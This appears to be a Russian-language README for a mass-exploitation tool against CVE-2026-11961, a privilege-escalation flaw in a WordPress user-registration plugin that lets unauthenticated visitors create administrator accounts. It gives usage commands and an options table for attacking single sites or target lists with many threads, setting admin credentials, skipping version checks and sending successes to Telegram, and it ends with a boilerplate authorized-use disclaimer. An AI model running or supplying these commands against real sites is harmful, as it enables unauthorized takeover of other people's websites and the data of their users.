
CVE-2026-11961 — UserRegistration: регистрация пользователей WordPress <= 5.2.2 — повышение привилегий. Неправильно настроенные роли участников → неаутентифицированное создание администратора → компрометация сайта. CVSS 8.1
Mass Exploit инструмент для CVE-2026-11961, затрагивающий плагин WordPress User Registration & Membership.
--force)# Показать справку
python3 mass.py -h
# Одиночная цель
python3 mass.py -u https://target.com
# Одиночная цель с пользовательскими учётными данными
python3 mass.py \
-u https://target.com \
--username admin \
--password "StrongPassword123!"
# Несколько целей
python3 mass.py -l targets.txt -t 20
# Сохранить успешные результаты
python3 mass.py -l targets.txt -o results.jsonl
# Записать файл журнала
python3 mass.py -l targets.txt --log exploit.log
# Уведомления в Telegram
python3 mass.py \
-l targets.txt \
--tg-token YOUR_BOT_TOKEN \
--tg-chat YOUR_CHAT_ID
# Прокси
python3 mass.py \
-u https://target.com \
--proxy http://127.0.0.1:8080
# Принудительный режим
python3 mass.py -u https://target.com --force
Этот проект предоставляется исключительно для авторизованных оценок безопасности, оборонительных исследований в области безопасности и проверки уязвимостей.
Используя данное программное обеспечение, вы подтверждаете, что имеете явное разрешение на оценку целевых систем. Несанкционированный доступ к компьютерным системам запрещён и может нарушать действующее законодательство.
Автор и участники не поощряют и не одобряют несанкционированное использование этого проекта и не несут никакой ответственности за любое неправомерное использование, ущерб или юридические последствия, возникшие в результате его использования.
JohenLastGen JLG NETWORK
| Параметр | Описание |
|---|
-h, --help | Показать справочное сообщение и выйти |
-u, --url | URL одиночной цели |
-l, --list | Файл, содержащий URL целей (по одному на строку) |
--username | Имя администратора (по умолчанию: генерируется случайно) |
--password | Пароль администратора (по умолчанию: генерируется случайно) |
-t, --threads | Количество параллельных потоков (по умолчанию: 5) |
--timeout | Тайм-аут запроса в секундах (по умолчанию: 15) |
-o, --output | Сохранить успешные результаты в файл JSONL |
--log | Сохранять журнал консоли в файл |
--proxy | HTTP/HTTPS прокси (например, http://127.0.0.1:8080) |
--force | Пропустить проверку версии и продолжить обработку |
--tg-token | Токен Telegram-бота |
--tg-chat | ID чата Telegram |